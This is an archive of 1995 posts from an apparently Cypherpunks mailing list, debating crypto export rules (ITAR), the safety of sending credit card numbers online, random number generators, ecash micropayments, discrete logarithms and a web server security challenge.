> I move we file a CJR on some suitable software with crypto hooks.

If you want to get really warped, feel free to file a CJR for Privtool,
it's a mail program with crypto hooks but no crypto, and has the added
advantage of being written outside the US but still illegal to export, as
far as I can tell (certainly it's now on the export-controlled section of 
c2.org).

In fact, maybe I should file one myself, as it's a real pain to have to 
tell non-US users to get it from a non-US site rather than the 'official' 
distribution site at c2.org. Can non-US citizens do these things ?

	Mark






From adam at lighthouse.homeport.org  Tue Nov 14 16:10:34 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Wed, 15 Nov 1995 08:10:34 +0800
Subject: ANNOUNCE: Curve Encrypt 2.2
In-Reply-To: <Pine.ULT.3.91.951113204535.2116G-100000@Networking.Stanford.EDU>
Message-ID: <199511142342.SAA03627@homeport.org>


| Sounds cool, but...
| 
| I already have PGP on my Macs. Why would I want this?

Much easier to use.  Faster than PGP on a mac.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From jimbell at pacifier.com  Tue Nov 14 16:11:07 1995
From: jimbell at pacifier.com (jim bell)
Date: Wed, 15 Nov 1995 08:11:07 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <m0tFUJh-00091rC@pacifier.com>



Scott Brickner <sjb at universe.digex.net> writes:

>Jeff Barber writes:
>>Does anyone know the ostensible justification for this?  What section of
>>the ITARs do they point to when they say "this is illegal"?  I've perused
>>an online copy of ITAR (no, I haven't read all of it -- I have other
>>things I want to do this year :-), but I can't find a section that could
>>be construed to support this contention.
>
>I think it's 121.1, Category XIII paragraph (b) item (5):
>"Ancillary equipment specifically designed or modified for paragraphs (b)
>(1), (2), (3), (4) and (5) of this category;"

Question:  What makes computers in general NOT describable by such a
paragraph?!?






From cassiel at alpha.c2.org  Tue Nov 14 16:15:14 1995
From: cassiel at alpha.c2.org (Cassiel)
Date: Wed, 15 Nov 1995 08:15:14 +0800
Subject: Cypherpunk FAQ
Message-ID: <199511142338.PAA03302@infinity.c2.org>


Hi, I'm new to the list, so please don't flame me too badly if this is a dumb question.  At least restrict the flames to private email where no one else can hear me scream.  :>

I downloaded the Cypherpunk FAQ from the Cypherpunk Website.  When I decompressed it, all it contained were the words "Yoo hoo, anybody home?"  Has the FAQ been corrupted or is this an in-joke?

Also, the Privacy FAQ states it was written by L. Detweiler.  Is this THE L. Detweiler?  If so, why is it in the archives?

Thanks for helping me out.

Cassiel





From rsalz at osf.org  Tue Nov 14 16:32:55 1995
From: rsalz at osf.org (Rich Salz)
Date: Wed, 15 Nov 1995 08:32:55 +0800
Subject: Get your own ITAR
Message-ID: <9511150016.AA14450@sulphur.osf.org>


    1 703 875 6644.
The kindly administrative assistant there will take your name and address
and send you a hardcopy of the ITAR regulations.  I don't know about
overseas mailings.  I also imagine you will have to wait until the current
US budget stale-mate is resolved.  (Thanks to digest-reader walt at osf.org
for the phone number.)
	/r$





From ac at hawk.twinds.com  Wed Nov 15 08:50:29 1995
From: ac at hawk.twinds.com (Arley Carter)
Date: Wed, 15 Nov 95 08:50:29 PST
Subject: credit card conventional wisdom
In-Reply-To: <9511151447.AA10433@absolut.osf.org.osf.org>
Message-ID: <Pine.HPP.3.91.951115112428.20058C-100000@hawk.twinds.com>



This may be a stupidly obvious question but..... 
We could argue until the cows come home, hell freezes over or the Cubs win
the World Series, what ever comes first ;-) about whether giving your credit
card number to a waiter or an 800 # clerk is any more or less secure than
transmitting it encrypted or clear text over a data link.

However, this misses a very large point.  The reason I will give my 
credit number to a clerk is that the bank/credit card consortium will
indemnify me against losses from fraudulent use of my card. Tearing up your
carbons is more to protect the bank than it is to protect you. The risk to
*me* is virtually zero if I am a good bank customer.  

I have seen no such statement from the Visa/MasterCard/bank consortiums
regarding who is at risk if my card number is stolen and used in cyberspace.
When I get a written indemnification from them stating clearly that 
using my credit card in cyberspace is no different from using in a local
restaurant, then I see no risk to the user in using the card in cyberspace.

The risk to the bank and merchant.......Now that is a different matter.
Credit card usage on the net will never take off until this issue is
solved to the satisfaction of the bank and the user.  Until this happens
arguing this issue is like arguing about how many angels can fit on the 
head of a pin.

Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac at hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation of government agency>."

 On Wed, 15 Nov 1995, Howard Melman wrote:

> 
> 
> On Tue Nov 14, 1995, Vladimir Z. Nuri wrote:
> 
> > attempts to get secure credit card number transfer on the
> > internet are not an end in themselves. they are the first
> > steps toward an entirely new transaction system. those who
> > see a single step and criticize it as feeble in the
> > context of past systems are missing the point and
> > apparently can't think past the present nanosecond of
> > their lives.
> 





From hallam at w3.org  Wed Nov 15 09:00:13 1995
From: hallam at w3.org (hallam at w3.org)
Date: Wed, 15 Nov 95 09:00:13 PST
Subject: credit card conventional wisdom
In-Reply-To: <Pine.SOL.3.91.951114203506.18220A-100000@chivalry>
Message-ID: <9511151659.AA03934@zorch.w3.org>



>No. What Phil is saying is that the magnetic strip contains an extra 
>group of digits which are only available when the stripe is read, and not 
>when the card is used for CNP. 

The extra gigits I was refering to are the ones on the front of the card 
but not embossed.

Credit card data formats are avaliable in an issue of phrack. There is
also an article on credit card abuse "safe and esay carding by VaxBuster".
VaxBuster is I believe currently living in a secured community somewhere
in Texas making little ones out of big ones.l

	Phill

PS Simon is right about Blum Blum Shub, note that there is a new PRNG
avaliable called Pew, Pew, Barley, McGrew.





From wilcoxb at nagina.cs.colorado.edu  Tue Nov 14 18:41:03 1995
From: wilcoxb at nagina.cs.colorado.edu (Bryce)
Date: Wed, 15 Nov 1995 10:41:03 +0800
Subject: encryption in BeOS kernel
Message-ID: <199511150222.TAA15162@nagina.cs.colorado.edu>



-----BEGIN PGP SIGNED MESSAGE-----

Some of you may be aware of this interesting new computer named the
"BeBox" which will start shipping in Q1 96 I think.
 Go here for more info. 


A paragraph on the Q&A page caught my attention and when they asked
for expert advice I naturally thought of you guys.


"Q: What security protection will the BeBox have?

 A: We're planning to offer a security/encryption mechanism at the
 kernel level. However, we haven't nailed down the details of this
 mechanism, so your expert input would be appreciated. One of our
 primary interests is to allow encryption of application software for
 individual machines. (The flash ROM in each BeBox will be serialized
 in the portion of the ROM which is unmodifiable.)"


I have two things to add:

1.  The scheme they mention there is, I think, intended to be a 
software protection scheme and like all such is doomed to failure.  
I hope they don't spend to much effort on it.  On the other hand
there might be some nifty crypto applications that could use this
unique identifier.  Although none come to mind...


2.  Be, Inc. is located in Menlo Park, CA, USA and Paris, France.  
They couldn't have picked two countries who are more likely to 
royally screw them by restricting the export/sale of their product 
once said product has encryption built-in.  (Of course they could 
put the encryption in a loadable kernel module, which would be an 
interesting test of ITAR's "crypto-with-a-hole" restrictions.)


I hope the NSA isn't reading this and getting ideas...


Bryce

signatures follow

            "To strive, to seek, to find and not to yield."   
    <a href="http://www-ugrad.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce at colorado.edu                   </a>


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMKlOufWZSllhfG25AQFQWwP/TQ6MM3xmoZ6bel/mTsLhX/TpEOn5YWMc
F6IsTUfpLbCMHGUmIoF09qFJNaB2zvPhy8gzx9eZxU1EoPYBCi76q/pNWGiyw0Xa
21iRjC62pq/v8oroQCPpLgU27btd8EBlz7/q46tzWD1Jphb5IjTQ1L0PxqQB6H5t
EBhbsR8h9iA=
=9bYq
-----END PGP SIGNATURE-----





From hallam at w3.org  Tue Nov 14 18:52:04 1995
From: hallam at w3.org (hallam at w3.org)
Date: Wed, 15 Nov 1995 10:52:04 +0800
Subject: credit card conventional wisdom
In-Reply-To: <199511150156.RAA18623@netcom21.netcom.com>
Message-ID: <9511150233.AA31764@zorch.w3.org>



The articile misses the point. What the credit card cos are worried about is the 
disclosure of credit card numbers in bulk by merchant servers connected 
incompetently to the internet. The issue of customer exposure is a non issue, 
regulation E means that there is no customer risk.

There is in fact a distinction between "card present" and "card not present"
transactions. AMEX cards for example have an extra group of four digits which 
are not part of the embossed card number. They are used as additional 
verification to prove that a card is present. In general a merchant pays a lower 
commission for card present transactions to reflect the reduced risk.

The point of the article is that people running roung like headless chickens 
because of Internet insecurity miss the main point, the security is no worse 
than the real world we just have rather higher standards.

What it does mean is that people like myself will be able to make a nice living 
explaining to people what security issues to forget and which ones to worry like 
hell about.


		Phill





From charles at europages.com  Tue Nov 14 19:11:45 1995
From: charles at europages.com (charles at europages.com)
Date: Wed, 15 Nov 1995 11:11:45 +0800
Subject: unsuscribe
Message-ID: <9511140946.AA02846@europages.com>


unsuscribe









From greg at ideath.goldenbear.com  Tue Nov 14 19:39:29 1995
From: greg at ideath.goldenbear.com (Greg Broiles)
Date: Wed, 15 Nov 1995 11:39:29 +0800
Subject: credit card conventional wisdom
Message-ID: <199511150321.AA17449@ideath.goldenbear.com>


-----BEGIN PGP SIGNED MESSAGE-----

Detweiler writes:

> the argument goes like this: secure credit card number uploading
> schemes (such as in Netscape) are not important on the internet because 
> credit card numbers are already insecure. you give them to low-wage
> workers all the time who might steal the number from you anyway.

> there are a lot of fallacies with this. I find this to be a key
> cypherpunk issue, and I hope others will agree to the point of
> trying to attack this fallacy through letters to the editor,
> debates, etc., because it seems to rationalize weak security.

You're only reproducing half of the debate, which goes like this:

Businesses/customers won't trust the Internet for commerce, because it's
not perfectly secure.

And then others go on to point out that businesses and consumers do business
every day using commerce tools whose security features are weak to nonexistent.

So, no, we don't have to "get the Internet ready for business" because it's
already at least as secure as ordinary consumer transactions. This doesn't
mean that it's not important to work on security, just that it's a useful
direction for improvement, not a baseline requirement.

Most consumer-level transactions are based on a general sort of 
trust-in-human-nature sort of policy, backed up by the knowledge that a single
failed transaction (or even a constant low level of failed transactions, where
failed == "didn't get paid but gave the stuff away") isn't likely to kill off
a business or even make it unprofitable. Loss by theft or fraud can be thought
of like any other sort of overhead - and it doesn't make sense (financially)
to spend more to eliminate it than you'll recover by that elimination. 
Pursuing criminal or civil charges against a non-performing party is 
expensive - most people do it out of a sense of moral outrage, or because they
want to maintain a public perception of unforgiveness, not because they 
really think they'll get back what they've expended in time, money, and 
opportunities lost for other (more profitable) pursuits. (see Axelrod on
the Prisoner's Dilemma tournaments for the arguable game-theory C-punks
cryptoanarchy relevance.)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKlcz33YhjZY3fMNAQEAlwP7B+cP/IB1wZ0TeWwwoL5j9z4m5irIO9yV
O5599i6fiJ2X3+HbJKGY0/aENs1Zq6kNPHo1I/HcjBhN3fazwelv5BV1dFfmnfUp
lPA8DOTraM7qGse6JEpG+tyJa7bL4wadjDAlFVe4uPSxokw1gppBMkZa6pcwd3cX
zQ7ammmgeQI=
=ZZi9
-----END PGP SIGNATURE-----





From kecooper at maroon.tc.umn.edu  Tue Nov 14 20:22:32 1995
From: kecooper at maroon.tc.umn.edu (Karen E Cooper)
Date: Wed, 15 Nov 1995 12:22:32 +0800
Subject: Applied Cryptography MPLS Book Release Party
In-Reply-To: <30a9659e030b002@maroon.tc.umn.edu>
Message-ID: <30a967be0ba7002@maroon.tc.umn.edu>


APPLIED CRYPTOGRAPHY 2nd Ed. BOOK RELEASE PARTY

Please come out and meet author Bruce Schneier at a drinks and hors
d'oeuvre reception to celebrate the publication of Applied Cryptography,
2nd Ed. 

The reception is in Minneapolis, Minnesota on Wednesday, 29 November, 1995, 
from 5:00 to 8 pm.

RSVP for directions and specifics.


Karen Cooper
(612) 823-1098
kecooper at maroon.tc.umn.edu






From ses at tipper.oit.unc.edu  Tue Nov 14 20:55:09 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Wed, 15 Nov 1995 12:55:09 +0800
Subject: credit card conventional wisdom
In-Reply-To: <9511150243.AA14648@sulphur.osf.org>
Message-ID: <Pine.SOL.3.91.951114203506.18220A-100000@chivalry>


On Tue, 14 Nov 1995, Rich Salz wrote:

> >There is in fact a distinction between "card present" and "card not present"
> >transactions. AMEX cards for example have an extra group of four digits which 
> >are not part of the embossed card number. They are used as additional 
> >verification to prove that a card is present.
> 
> So the run-it-through-the-mechanical-device is treated as card not present?

No. What Phil is saying is that the magnetic strip contains an extra 
group of digits which are only available when the stripe is read, and not 
when the card is used for CNP. 

I can't confirm or deny this, as despite my new bosses, I still find it 
hard to care about credit card readers (mostly because US banks won't 
let me have any). 

Simon






From ses at tipper.oit.unc.edu  Tue Nov 14 21:02:32 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Wed, 15 Nov 1995 13:02:32 +0800
Subject: [NOISE] Random Thoughts (was Re: BBS Generator Code)
In-Reply-To: <Pine.3.89.9511142310.A14556-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.SOL.3.91.951114204508.18220B-100000@chivalry>



Re: Blum-Blum-Shub.

Isn't the best reason to use BBS the fact that it's just so 
much fun to say- it sounds like something out of Lovecraft.
Blum Blum Shub Niguath, the Black Code of the woods with a thousand bits. 

MD5 and LFSRs are just plain dull.

Simon // All I wanna do is make a Blum-Blum-Shub with a zoom-zoom






From tcmay at got.net  Tue Nov 14 21:15:57 1995
From: tcmay at got.net (Timothy C. May)
Date: Wed, 15 Nov 1995 13:15:57 +0800
Subject: encryption in BeOS kernel
Message-ID: <acceb284000210049f9b@[205.199.118.202]>


Either John Young or someone imitating his style wrote:

>Would chip-fabbers covertly Fortezza chips to get export ok?
>

I have no idea what "Fortezza" means as a verb, but I'll Moscow a guess:
Intel might, according to this guesser, insert NSA-approved back doors in
"information appliance" chips.

Unlikely in the extreme, for a variety of reasons. First, designers cannot
keep secrets. Second, examination of the chips would reveal such meddling.
Third, Intel is only one of several likely providers of such chips (e.g.,
Oracle is said to have plans to use Acorn ARM chips, and DEC may also
provide low-end Alpha chips, and of course Motorola-IBM has variants of the
PPC to provide).

>Motorola, HP, IBM, others long-linked to USG are ever ready
>to gobble international market share in the national
>interest.
>
>Intel, sure, world-class fab plants planting chip-secrets.
>
>Wonder if that key escrow protest to Gore is a cover for
>economic actions authorized by National Security D&D?

Too much Pynchon?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From anonymous-remailer at shell.portal.com  Tue Nov 14 21:26:01 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Wed, 15 Nov 1995 13:26:01 +0800
Subject: credit card conventional wisdom
Message-ID: <199511150512.VAA08514@jobe.shell.portal.com>


On Tue, 14 Nov 1995, Greg Broiles wrote:

> Detweiler writes:
> 
> > the argument goes like this: secure credit card number uploading
> > schemes (such as in Netscape) are not important on the internet because 
> > credit card numbers are already insecure. you give them to low-wage
> > workers all the time who might steal the number from you anyway.
> 
> > there are a lot of fallacies with this. I find this to be a key
> > cypherpunk issue, and I hope others will agree to the point of
> > trying to attack this fallacy through letters to the editor,
> > debates, etc., because it seems to rationalize weak security.
> 
> You're only reproducing half of the debate, which goes like this:

Actually, this is not quite correct.  There is a difference if I give a
credit card to *one* person, or if I give the message containing that
number to a chain of twenty or thirty strangers to get my information to
the one person I want to have that information. 

We're back to handing your card to the neighbour, who gives it to the 
doorman, who flags the cab and gives it to a cabbie, who then drives 
cross town and gives it to another doorman, who then etc, etc.

Something completely different than the long bomb from the quarterback.

Our potential interception points have increased substantially ... and we
have absolutely no audit trail to figure out who *might* have scarfed the
card. 

I guess the average customer won't care.  His loss is limited to $50.

But some of us who try to live in the real world wonder how long that'll
last.  Can we measure the life of it in a matter of weeks??  Or months? 

> Businesses/customers won't trust the Internet for commerce, because it's
> not perfectly secure.
> 
> And then others go on to point out that businesses and consumers do
> business every day using commerce tools whose security features are weak
> to nonexistent. 

Hmmm ... maybe we'll even get a whole whole new industry going ... don't
ya think??  Maybe we can create a whole new set of risks which are
additive to those we already have.  Maybe every petty grifter might trade
in his very own credit card number and simply claim that their credit card
got stolen over the internet. 

Just disappeared into the anonymous aethyr ... the one without an audit
trail ... but my loss is limited to $50, right??

I guess other people understand systems much, much, more than I do.  I
guess that the NY Times is right ... it won't change the loss rate for the
card companies, at all ... nope ... won't create a new problem ... naahh
... the public wouldn't actually take advantage of holes like this in the
system. 

Nope, no sirreee ...  

Give your head a shake.




Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From ses at tipper.oit.unc.edu  Tue Nov 14 21:53:20 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Wed, 15 Nov 1995 13:53:20 +0800
Subject: Who needs time vaults anyway?
In-Reply-To: <v02120d05accab753260f@[199.0.65.105]>
Message-ID: <Pine.SOL.3.91.951111130652.15607B-100000@chivalry>


On Sat, 11 Nov 1995, Robert Hettinga wrote:

> In the real world, there's a trustee/nominee of some sort who does this.
> What's that to keep that from happening on the net, just like our much
> maligned (guy's gotta make a living, fer chrissake!) assassination-payoff
> escrow agent...

Nothing really;  It would probably be better to do some sort of secret 
sharing and use a number of somewhat trusted escrow-agents, but the 
protocols aren't too complex. 

For the simple case where the release is time based, you could even make 
the process totally automatic; just have the escrow agents send off their 
bits of the key when the time has expired, and voila.

As for real time-release - how about just using conventional encryption, 
and require it to be brute-forced?

Depending on how fine grained you want the release to be, you could also 
take the inverse of Moore's law, work out how big a key you need to have 
it unbreakable in less than the desired time, add in whatever fudge 
factors you feel like based on how much it would be worth to the opponent 
to get early access, then lock up the secret and throw away the key. 

Simon





From jamesd at echeque.com  Tue Nov 14 21:54:59 1995
From: jamesd at echeque.com (James A. Donald)
Date: Wed, 15 Nov 1995 13:54:59 +0800
Subject: ecash speed
Message-ID: <199511112122.NAA02204@blob.best.net>


At 12:21 PM 11/9/95 -0800, jim bell wrote:

>I think that one thing that's needed is the concept of probabilistic payments.

Problem:  If the recipient verifies the coin infrequently, then someone 
can browse with slugs, accepting a modest probability of random URL
failure.

If the recipient verifies the coin regularly, then the cost of 
verification is still the same as ever.

Another poster earlier suggested the following solution, which seems
to me much better:  When you access the home page of the Playboy 
dirty pictures web site, you automatically buy a bunch of 
seemingly random numbers from them:  Every time you click on a 
URL, you spend one or more of their numbers.  If you have some 
left over when you are through, you can keep them or cash them.

This would mean two expensive transactions (high calculation and 
communication costs) per provider, instead of one expensive transaction
per click.

It also means that providers could make their tokens as cheap or expenisive
as they wished, down to microcents if they felt so inclined.

It also means that every shop around the world would be issuing 
their own money, making it impossible to trace anything in practice
even if everything was traceable in principle.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From blancw at accessone.com  Tue Nov 14 21:55:55 1995
From: blancw at accessone.com (blancw at accessone.com)
Date: Wed, 15 Nov 1995 13:55:55 +0800
Subject: the revolution of microcurrency
Message-ID: <9511112128.AA29071@pulm1.accessone.com>


>From Thomas Junker (in reply to Vlad):

> this same idea works with software. you don't see
> software as an end product. you see it as something that
> is evolving over time. and whenever you send money to a
> company for software, in this new system the idea is that
> "I like this software, and I want to see it grow. here
> is my contribution to that".

People as marketplace players do not think like that.  
....................................................

This is a very important point to consider:  how a person as a customer will 
_actually_ think.  

It is easy enough to propose schemes based on one's preferences of how one 
would like a potential customer to make decisions about services, products, and 
methods of payment for what is offered.  But doing the customer's thinking for 
them doesn't automatically transform them into that line of reasoning.

To better compute whether they will proceed according to how you have imagined, 
it is more realistic to consider how the other person reasons on the 
circumstance they are facing - from their perspective.    

Market researchers actually carry out tests for consumer response and 
acceptance of products or payment schemes in order to gauge their success.  And 
there are many kinds of potential customers, who will make different decisions 
in regard of the same thing:  some will find it a good idea to think about 
software in terms of "contributing to its growth" in the longterm, but some 
will have immediate needs which they are trying to satisfy and may think "I 
need a solution to my problem *right now*" and will look for the 
product/service which will solve their problem as it stands in the present.

This is another attractive feature of "the free market":  in it one can find 
all sorts of schemes & methods for solving all sorts of problems in different 
ways.  There is no single type of consumer, no single circumstance, no one 
service or product or scheme which will satisfy everyone, equally, at all 
times.  

"May the Best Man Win", and "To the Victor Belong the Spoils".  <g>

  ..
Blanc






From daw at CS.Berkeley.EDU  Tue Nov 14 21:59:53 1995
From: daw at CS.Berkeley.EDU (David A Wagner)
Date: Wed, 15 Nov 1995 13:59:53 +0800
Subject: Diffie-Hellman in GF(2^n)?
Message-ID: <199511122243.OAA18565@delhi.CS.Berkeley.EDU>


In article <Pine.SUN.3.91.951110184600.19312B-100000 at eskimo.com> you write:
> Most Diffie-Hellman implementations currently use the multiplicative group
> of prime fields.  However, the multiplicative group of finite fields of
> characteristic 2 (GF(2^n)) can also be used and should be easier to
> implement.  Is there any reason why they should not be used?  Does anyone
> know the asymptotic running time of the best algorithm for calculating
> discrete logarithms in GF(2^n)? 

I remember that the discrete log problem is quite a bit easier
in GF(2^n), but I don't remember how much easier.   Let me try
to look it up...

A. Odlyzko has a paper recommending that people should not use
GF(2^n) for discrete log applications; in it he states that you
will need at the minimum n > 800, and probably n > 1500.  (And
you also need to choose n carefully.)  A quote from the abstract:

``Hence the fields GF(2^n) out to be avoided in all cryptographic
applications.''

I don't know enough about number theory to judge for myself;
but you can read the (long) paper yourself at

	ftp://netlib.att.com/netlib/att/math/odlyzko/discrete.logs.ps.Z

I hope this helps!





From shamrock at netcom.com  Tue Nov 14 22:02:31 1995
From: shamrock at netcom.com (Lucky Green)
Date: Wed, 15 Nov 1995 14:02:31 +0800
Subject: WebSTAR security challenge. Make $10,000 breaking in a site.
Message-ID: <v02120d02accf288d9174@[192.0.2.1]>


>From TidBITS:

**$10,000 Internet Security Challenge** -- I wrote about the
  WebMaster Macintosh security challenge back in TidBITS-295_ and,
  as expected, no one was able to break WebSTAR's security and claim
  the prize of free passes to the WebEdge conference. Now the stakes
  have increased. Seven companies - StarNine, EveryWare, Maxum,
  ComVista Internet Solutions, WebEdge, Digital Forest, and Westwind
  Computing - have joined forces to offer a more lucrative prize of
  $10,000. The new challenge is similar: you must break WebSTAR's
  security to find information that's isn't available to the public
  and report it by midnight on 30-Nov-95. Check out the rest of the
  details online if you are interested. [ACE]

http://challenge.comvista.com/

-- Lucky Green <mailto:shamrock at netcom.com>
   PGP encrypted mail preferred.







From shamrock at netcom.com  Tue Nov 14 22:14:00 1995
From: shamrock at netcom.com (Lucky Green)
Date: Wed, 15 Nov 1995 14:14:00 +0800
Subject: Secondary Ecash applications on hold
Message-ID: <v02120d03accf2ca386e5@[192.0.2.1]>


A few weeks ago, I promised you all to write some scripts that will lay the
groundwork for some of the more unusual applications of Ecash.
Unfortunately, I went straight from one contract to the next and didn't
find the time to work on the scripts.

I am currently in St. Louis, making sure that Ecash makes the impact on
Internet commerce that many of us think it should make. Anyone on this list
that ever thought of opening a shop using Ecash or is interested in Ecash
in general is encouraged to email me at support at marktwain.com and share
their ideas.

TIA,


-- Lucky Green <mailto:shamrock at netcom.com>
   PGP encrypted mail preferred.







From mch at squirrel.com  Tue Nov 14 22:55:01 1995
From: mch at squirrel.com (Mark C. Henderson)
Date: Wed, 15 Nov 1995 14:55:01 +0800
Subject: CSE gets flak on TV
In-Reply-To: <Pine.3.89.9511141646.A37652-0100000@tesla.cc.uottawa.ca>
Message-ID: <9511142245.ZM12784@squirrel.com>


On Nov 14, 16:47, s1113645 at tesla.cc.uottawa.ca wrote:
> Subject: CSE gets flak on TV
> For those who care, the Communications Security Establishment has been
> getting some flak for spying on Mex. during NAFTA talks and on Korea to
> help us sell Can. nuke reactors:

Folks who are interested in the CSE should also check out the
"unofficial CSE home page" at
http://watserv1.uwaterloo.ca/~brobinso/cse.html

There is also a very dull "official" home page at
http://www.cse.dnd.ca


-- 
Mark Henderson -- markh at wimsey.bc.ca, henderso at netcom.com, mch at squirrel.com
PGP 1024/C58015E3 fingerprint=21 F6 AF 2B 6A 8A 0B E1 A1 2A 2A 06 4A D5 92 46
cryptography archive maintainer  --  ftp://ftp.wimsey.com/pub/crypto
ftp://ftp.wimsey.com/pub/crypto/sun-stuff/change-sun-hostid-1.5.1.tar.gz





From jimbell at pacifier.com  Tue Nov 14 23:10:54 1995
From: jimbell at pacifier.com (jim bell)
Date: Wed, 15 Nov 1995 15:10:54 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <m0tFbde-0008zsC@pacifier.com>


> > >I think it's 121.1, Category XIII paragraph (b) item (5):
> > >"Ancillary equipment specifically designed or modified for paragraphs (b)
> > >(1), (2), (3), (4) and (5) of this category;"
> > 
> > Question:  What makes computers in general NOT describable by such a
> > paragraph?!?
>
>"specifically designed"?
>
>nathan

That makes it easy:  Just make sure that you also write a compressor or
filter program with similar compatibility, and nobody can argue that the
hooks were SPECIFICALLY DESIGNED for encryption.






From E.J.Koops at kub.nl  Wed Nov 15 01:45:57 1995
From: E.J.Koops at kub.nl (Bert-Jaap Koops)
Date: Wed, 15 Nov 1995 17:45:57 +0800
Subject: Crypto requlations & laws
Message-ID: <MAILQUEUE-101.951115103109.320@frw3.kub.nl>


> Could the person posting the location of the crypto laws please repost.
http://www.kub.nl:2080/FRW/CRI/projects/bjk/lawsurvy.htm

Bert-Jaap Koops





From vznuri at netcom.com  Wed Nov 15 02:12:14 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Wed, 15 Nov 1995 18:12:14 +0800
Subject: credit card conventional wisdom
Message-ID: <199511150156.RAA18623@netcom21.netcom.com>



I've been seeing a particular meme-nugget of conventional wisdom
circulating in reference to credit cards that I'd like to debunk.
(recently showed up in the WSJ, "Boardwatch" magazine editorial
column, etc). these legends and thinkings are starting to annoy
me to the point of becoming a pet peeve.

the argument goes like this: secure credit card number uploading
schemes (such as in Netscape) are not important on the internet because 
credit card numbers are already insecure. you give them to low-wage
workers all the time who might steal the number from you anyway.

there are a lot of fallacies with this. I find this to be a key
cypherpunk issue, and I hope others will agree to the point of
trying to attack this fallacy through letters to the editor,
debates, etc., because it seems to rationalize weak security.

- 1st point: yes, you do give credit cards to low wage workers
in businesses, but this is not directly parallel to sending a
credit card over the internet. the fuzzy thinking goes like
this: "credit card numbers are already not secure. therefore, trying to
secure them is frivolous". this is patently ridiculous on the
face of it. it's circular reasoning. credit card numbers could
become more secure if all businesses made them more secure.
getting all businesses to make them secure is part of the battle.
raising consciousness on the issue is part of the battle. saying,
"there is no point" is a copout imho.

- the insecurity of sending a card over the net could be far better
or worse than that of handing it to an individual. 1st, when you
send a number over the net, potentially anyone (including people other
than the destination business) could spy on it. 
when you give it to someone in a company, only that representative
(who would be trusted by the company)
has access to it. or, alternately, maybe no one could *ever* see
your card sent over the internet, including workers at the end
site, who never deal with the numbers directly. such a system
is possible and may become the norm. but not if shallow-thinking 
people can't imagine it as possible.

- it is not impossible to have cards that don't have numbers but
instead have magnetic stripes, and the only way for them to work
is to be physically scanned. this would reduce fraud but would also
reduce the convenience of sending numbers over the phone (mail
order) for example. I'm not saying all cards should be this way,
but it might make sense for some people to get a "scan only card"
that cannot be used unless physically scanned. the point is that
there are variations on the credit card theme that make them more
secure, and there's a bit of a hurdle in getting Joe Sixpack to
realize this, and realize it's desirable.

- the boardwatch magazine editor argued that uploading credit card numbers
over the internet in a secure fashion is a "non problem" because
credit cards are already insecure. have you ever heard of PROGRESS,
mr. bonehead? if the net began to make credit transactions more
secure, perhaps that would create a momentum in which other offline
businesses might become more strict or careful about credit card
security.

- credit card fraud is absolutely enormous in this country. and there
are not really any very strong safeguards against it except a 
lot of "security through obscurity" (of credit card numbers). *everyone*
pays the cost of this horrible fraud rate through increased
transaction charges, higher interest rates, etc.  just because you
may not see it itemized on your credit card bill, does not mean you
are not paying for it. (in much the same way that a sort of
"shoplifting tax" is reflected in the cost of all merchandise).

- the internet may eventually become completely secure. arguing that
"we don't need security on the internet because we don't have it in
the business world of daily credit card use, and they get along fine"
is ridiculously simplistic and specious. the fact is that businesses
do *not* really like many aspects of credit cards: low security,
overhead costs, cost of interface devices to the credit card companies,
etc.  all these negative ingredients could be improved in cyberspace.
but it won't happen if every time a new superior system comes along,
someone argues, "but there's nothing wrong with what we have now!!!"
when this is quite obviously mistaken to anyone with any minimal 
background& understanding in the area. furthermore, consumers are
somewhat notorious for not really knowing what they want, and sometimes
arguing against something they would buy or use in the future.

==

I'm continually amazed at how often security issues are mixed up
in people's brains and reasoning. there are a lot of fallacies that
work their way into respectable writing by reputable people
that tend to mirror circular
reasoning such as, "if something is insecure already, it makes no
point to try to make a piece of it more secure".  security is sometimes won
slowly in increments, in which one could argue against each increment
as useless or inconsequential, but the end result could lead to 
far better security. furthermore, there are a lot of different kinds
of security weaknesses-- there is not a simple black-and-white 
measurement of "secure" vs. "insecure" but a lot of intermediate
gradations.

attempts to get secure credit card number transfer on the internet
are not an end in themselves. they are the first steps toward an 
entirely new transaction system. those who see a single step and
criticize it as feeble in the context of past systems
are missing the point and apparently can't think past the present 
nanosecond of their lives.






From anonymous-remailer at shell.portal.com  Wed Nov 15 02:29:34 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Wed, 15 Nov 1995 18:29:34 +0800
Subject: Netscape rewards are an insult
Message-ID: <199511151019.CAA18910@jobe.shell.portal.com>


Alice here ...

I know that this is *painfully* dated, and I apologize to the list for
replying to a one month old post, but I felt I had to put some final items
on the record.  And I think that this is still timely ... so ... 


On Sat, 14 Oct 1995, Dr. Frederick B. Cohen wrote:

> Phil typed:
